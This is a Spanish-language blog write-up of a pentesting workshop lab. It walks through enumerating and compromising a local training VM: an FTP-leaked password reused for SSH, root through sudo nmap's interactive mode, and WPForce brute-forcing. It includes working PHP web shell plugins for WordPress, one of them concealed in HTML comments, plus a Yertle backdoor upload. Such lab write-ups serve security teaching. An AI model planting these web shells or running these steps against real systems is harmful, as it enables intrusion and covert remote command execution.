Pentesting: illidan

Publicado: Jun 23, 2019

#aprendizaje#vpn

#hardening#pentesting

Repaso de lo aprendido en el taller de `#Pentesting4ever`

Impartido en el congreso de Seguridad informatica `#Euskalhack`

El write up Original aqui

Diapositivas de la presentacion

Indice:

1) Arranco la maquina a auditar illidian en virtualbox
2) Enumeracion: illidan (192.168.56.103)
3) explotacion
- 3a) Explotacion: Shell desde wordpress
- 3b) Explotacion: ssh
4) Escalada privilegios.
5) Varios
Pruebas plugins Metasploit Framework console.

1) Arranco la maquina a auditar illidian en virtualbox

Nota: Configuro la red como adaptador solo anfitrion.

La red de mis VM es 192.168.56.XX(este dato puede ser diferente en tu equipo (ip a |grep global))

em50l@jejo.es$ ip a |grep vbox
    inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0

Luego hago un nmap -sn 192.168.56.0/24 o nmap -sn 192.168.56.* a ver que sale:

em50l@jejo.es:~$ nmap -sn 192.168.56.*

Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-30 12:35 CEST
Nmap scan report for medion (192.168.56.1)
Host is up (0.00040s latency).
Nmap scan report for 192.168.56.103
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.32 seconds

bien. La ip es la 192.168.56.103

2) Enumeracion: illidan (192.168.56.103)

Aunque no es necesario (no es bueno hacer mucho ruido) voy a ver los puertos:
nmap -n 192.168.56.103 -p 1-1024

em50l@jejo.es$ nmap  192.168.56.103 -p 1-1024
Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-23 12:48 CEST
Nmap scan report for 192.168.56.103

PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Como nota al primer escaner veo: ftp ,ssh, http, correo pop3 y mircrosoft smb

Segundo paso haria un nmap 192.168.56.103 -sC (demasiada informacion de golpe)
Asi que para la explicacion mejor vamos puerto por puerto

2a) Enumeracion: ftp

modo manual: timeout 1 cat < /dev/tcp/192.168.56.103/21

em50l@jejo.es$ timeout 1 cat </dev/tcp/192.168.56.103/21
220 (vsFTPd 2.3.5)

Usando nmap: nmap 192.168.56.103 -sC -p 21

em50l@mipc:~$ nmap  192.168.56.103 -sC -p 21

Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-23 13:01 CEST

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Jun 08 19:42 TODO
|_-rw-r--r--    1 0        0              26 Jun 08 19:40 secret.txt

vsFTPd 2.3.5 - secure, fast, stable

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds

** vsFTPd 2.3.5 y… !!! Anonymous FTP login allowed (FTP code 230)!!!**

Bien si me conecto al ftp como anonimo: mc ftp://192.168.56.103
Uso el mc (Midnight comander) para navegar mas rapidamente.

  Izquierdo     Archivo     Utilidades     Opciones     Derecho                    
┌<─ ftp://192.168.56.103/TODO ─────.[^]>┐┌<─ ftp://192.168.56.103/ ──────────.[^]>┐
│.n    Nombre      │Tamaño │fecha Modifi││.n     Nombre      │Tamaño │fecha Modifi│
│/..               │DIR-ANT│ 8 jun 19:42││/..                │DIR-ANT│20 jun 00:03│
│ migration.txt    │     60│ 8 jun 19:38││/TODO              │   4096│ 8 jun 19:42│
│ pending.txt      │     55│ 8 jun 19:42││ .wp_back.bk       │     24│ 8 jun 19:39│
│                  │       │            ││ secret.txt        │     26│ 8 jun 19:40│
│                  │       │            ││                   │       │            │
├───────────────────────────────────────┤├────────────────────────────────────────┤
│ migration.txt                         ││/TODO                                   │
└───────────────────────────────────────┘└────────────────────────────────────────┘

em50l@jejo.es:~$                                                                 [^]
 1Ayuda  2Menú   3Ver    4Editar 5Copiar  6RenMov 7Mkdir  8Borrar 9Menú   10Salir

gif animado mc para ver archivos ftp

Veo que hay un archivo oculto con un posible password eUSk4l_99%. pero desconozco el usuario.
Echando un vistazo al blog curl 192.168.56.103 | grep author ( vemos que un autor es sean).
Veamos si hay reutilizacion de usuarios y contraseñas:
Pruebo: ssh sean@192.168.56.103 password: eUSk4l_99% (sacada del archivo que hemos visto via ftp)

em50l@mipc:~$ ssh sean@192.168.56.103 
sean@192.168.56.103's password: eUSk4l_99%
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic x86_64)
.
Last login: Sun Jun 21 12:28:28 2019 from 192.168.56.1
sean@illidan:~$ #  !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios

Otra forma:(uso sshpass para pasar la contraseña) `sshpass -p 'eUSk4l_99%' ssh sean@192.168.56.103` Podria sernos util si tengo que hacer un script personalizado.

em50l@jejo.es$ sshpass -p 'eUSk4l_99%' ssh sean@192.168.56.103 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic x86_64)
....
sean@illidan:~$ #  !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios

Truco:
Para ver la web por la consola puedes usar curl y un filtro html curl -s 192.168.56.103 |sed 's/<[^>]*>//g'

Truco: Para ver los autores del blog curl -s 192.168.56.103 | grep author

2b) Enumeracion: ssh

Pruebo con ssh -v y asi veo el protocolo y obtengo versiones.

em50l@jejo.es~$ ssh root@192.168.56.103 -v
OpenSSH_7.6p1 Ubuntu-4ubuntu0.3, OpenSSL 1.0.2n  7 Dec 2017
debug1: Connection established.
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4
debug1: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000000
root@192.168.56.103's password:

la vesion sshd es:OpenSSH_7.6p1 Ubuntu-4ubuntu0.3, OpenSSL 1.0.2n.

Intento enumerar usuarios.(creo un archivo usuarios con los datos anteriores)

msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file usuarios
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.56.103
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.56.103:22 - SSH - Using malformed packet technique
[*] 192.168.56.103:22 - SSH - Starting scan
[-] 192.168.56.103:22 - SSH - User 'cocinitas' not found
[+] 192.168.56.103:22 - SSH - User 'sean' found
[+] 192.168.56.103:22 - SSH - User 'root' found
[-] 192.168.56.103:22 - SSH - User 'illidan' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Veo que se puede acceder a la maquina via ssh con los usuarios sean y root.
Nota: la enumeracion ssh no siempre funciona.

2c) Enumeracion: http

em50l@jejo.es~$ nmap  192.168.56.103 -p 80 --script http-enum
Nmap scan report for 192.168.56.103

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /wp-login.php: Wordpress login page.
|_  /readme.html: WordPress version 4.6.6

em50l@jejo.es~$ curl -vs http://192.168.56.103 | grep server
> 
< HTTP/1.1 200 OK
< Date: Sun, 21 Jul 2019 13:57:17 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.26

2d) Enumeracion: smb

msf5 > use auxiliary/scanner/smb/smb_enumusers
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.56.103:139    - ILLIDAN [ nobody, sean ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.103:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) >

Consigo un nombre de usuario sean

4) Escalada privilegios.

Pruebo: ssh sean@192.168.56.103 password: eUSk4l_99% (sacada del archivo que hemos visto via ftp)

em50l@mipc:~$ ssh sean@192.168.56.103
sean@192.168.56.103's password: eUSk4l_99%
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic x86_64)
.
Last login: Sun Jun 21 12:28:28 2019 from 192.168.56.1
sean@illidan:~$ #  !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios

Metodo facil.
Compruebo si tiene nmap con modo interactive
Y si tiene screen ya seria pan comido

sean@illidan:~$ sudo nmap --interactive

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !screen

Screen version 4.00.03jw4 (FAU) 2-May-06

root@illidan:~#

En efecto ya tengo shell root.
Aqui habria que profundizar un poco mas. seguro que hay mas formas de escalar.

-Problema url en wordpress

https://wordpress.org/support/article/changing-the-site-url/

nano /var/www/wp-config.php

<?php
define('WP_HOME','/');
define('WP_SITEURL','/');
//define('WP_HOME','http://192.168.56.103/');
//define('WP_SITEURL','http://192.168.56.103/');

nano /var/www/wp-content/themes/twentyfourteen/functions.php

<?php
update_option( 'siteurl', '/');
update_option( 'home', '/');
//update_option( 'siteurl', 'http://192.168.56.103/');
//update_option( 'home', 'http://192.168.56.103/');

3a) Explotacion: Shell desde wordpress

la version de wordpress es WordPress 4.6.6
hago una busqueda WordPress 4.6.6 shell a ver que sucede.
Tambien puedes usar Yertle

Voy a la interfaz de administracion a plugings Add new
subo el archivo zip con el .php dentro.
Ojo el sistema crea una carpeta con el nombre del .zip
sube el archivo y al activarlo da error.
Aparentemente no funciona.

http://192.168.56.103/wp-content/plugins/wp_shell/
http://192.168.56.103/wp-content/plugins/wp_shell/shell.php

A ver con… https://github.com/danielmiessler/SecLists/tree/master/Web-Shells

Parece que los plug-ins de internet no funcionan (logico)

Me construllo uno sencillito

<?php
echo "Em50L plugin <br>\n";
echo '<pre> ';
system($_REQUEST['cmd']);
echo '</pre>';
?>

Lo evoluciono un poco. (para que aparezca algo de informacion en WP.
3a evolucion

<?php
    /*
    Plugin Name: Wordpress Shell Em50L
    Plugin URI: http://jejo.es
    Description: ejecuta comandos en el servidor
    Author: jejo Em50L
    */
//echo "<!-- \n\n";//Descomenta esta linea para ocultar resultado<!-- -->"
echo "Em50L plugin <br>\n";
echo '<form action="em50l_shell.php"><input type="text" name="cmd"></form>';
echo '<pre>';
echo dirname(__FILE__)."\n";
print_r($_REQUEST);
if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']);}
echo '</pre>';
echo "<!-- --> \n\n";
?>

Aqui teneis una captura en la que se ve como se llama al shell

4a evolucion Modo Oculto? solo se ve la salida desde mostrar codigo fuente.
Se puede activar el plugin y funcinaria desde cualquier pagina.
Este codigo Tambien valdria para el 404.php

<?php
    /*
    Plugin Name: Wordpress Shell Em50L
    Plugin URI: http://jejo.es
    Description: ejecuta comandos en el servidor
    Author: jejo Em50L
    */
echo "<!-- Em50L plugin \n\n" ;
if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); }
echo "<!-- --> \n";
?>

Capturas del sell oculto insertado en el archives de la plantilla captura en la que se ve como se llama al wp shell
POC de como ejecutaria cat /etc/*release

Escaneo Wordpress: wpscan.

root@kali:~# wpscan --url http://192.168.56.103
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.5.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.103/

Interesting Finding(s):

[+] http://192.168.56.103/
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3.26
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.103/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.103/readme.html
[+] Upload directory has listing enabled: http://192.168.56.103/wp-content/uploads/
[+] http://192.168.56.103/wp-cron.php
[+] WordPress version 4.6.6 identified (Insecure, released on 2017-05-16).
 |
 | [!] 27 vulnerabilities identified:
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8906
 |      - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://wpvulndb.com/vulnerabilities/8905
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.6.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.6.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.6.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.6.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.6.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.6.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.6.14
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.56.103/wp-content/themes/twentyfourteen/
 
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.

[+] Elapsed time: 00:00:10
root@kali:~#

Wpforce

Me descargo la app de:
https://github.com/n00py/WPForce
Igual es necesario instalar algunos modulos python pip install requests
Ojo con esta aplicacion (DOS) a mi sin -t 1 Me tira el servidor abajo.
python wpforce.py -i wp.txt -w pw.txt -u http://192.168.56.103 -t 1 -d

em50l@jejo.es$ python wpforce.py -i wp.txt -w pw.txt -u http://192.168.56.103 -t 1 -d
       ,-~~-.___.       __        __ ____   _____
      / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
     (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
      \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
         ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
        /  \-'~;   ||     |                v.1.0.0
       /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
     =(  _____||________|                 ~n00py~
    
Username List: wp.txt (579)
Password List: pw.txt (2)
URL: http://192.168.56.103
Trying: http://192.168.56.103/xmlrpc.php
http://192.168.56.103/xmlrpc.php found!
Now the brute force will begin!  >:)
Here is the content of the wordlists for each thread
Thread 0
['eUSk4l_99%', '']
-----------------------------------------------------
[Thread 0]Trying chef : eUSk4l_99%
[Thread 0]Trying gazpacho : eUSk4l_99%
[Thread 0]Trying pan : eUSk4l_99%
[Thread 0]Trying batidora : eUSk4l_99%
[Thread 0]Trying Sean : eUSk4l_99%
--------------------------
[Sean : eUSk4l_99%] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
[Thread 0]Trying site : eUSk4l_99%
[Thread 0]Trying rico : eUSk4l_99%
100% Percent Complete
All correct pairs:
{'Sean': 'eUSk4l_99%', 'sean': 'eUSk4l_99%'}

Yertle

Me descargo la app de:
https://github.com/n00py/WPForce
Igual es necesario instalar algunos modulos python pip install requests
python yertle.py -u sean -p "eUSk4l_99%" -t http://192.168.56.103

em50l@jejo.es$ pip install requests
em50l@jejo.es$ python yertle.py -u sean -p "eUSk4l_99%" -t http://192.168.56.103
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress
                     v.1.1.0
    
Backdoor uploaded!
Upload Directory: caiqwwg

os-shell> uname -a
Sent command: uname -a
Linux illidan 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:51:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

os-shell>

Primer contacto con Metasploit Framework console.

root@kali:~# msfconsole 
                                   .,,.                  .
                                .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P
                     d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p
                  d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88'
  d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P
  88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b
 d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
                          .a#$$$$$$"`          88b  d8P  88b`?8888P'
                       ,s$$$$$$$"`             888888P'   88n      _.,,,ass;:
                    .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$'
                 .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
              ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
           .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________   ,&$$$$$$'_____
                                                                 ll&&$$$$'
                                                              .;;lll&&&&'
                                                            ...;;lllll&'
                                                          ......;;;llll;;;....
                                                           ` ......;;;;... .  .
       =[ metasploit v5.0.20-dev                          ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 >

Es una interfax tipo REPL se puede usar tabular para mostrar los comandos.

Tecleo `use aux <tab> sca <tab> ht <tab> w <tab>` para ver un listado de los plugins de wordpress en la ruta `auxiliary/scanner/http/worrdpress_*`.

msf5 auxiliary(scanner/http/wordpress_xmlrpc_login) > use auxiliary/scanner/http/wordpress_<tecla tabular>

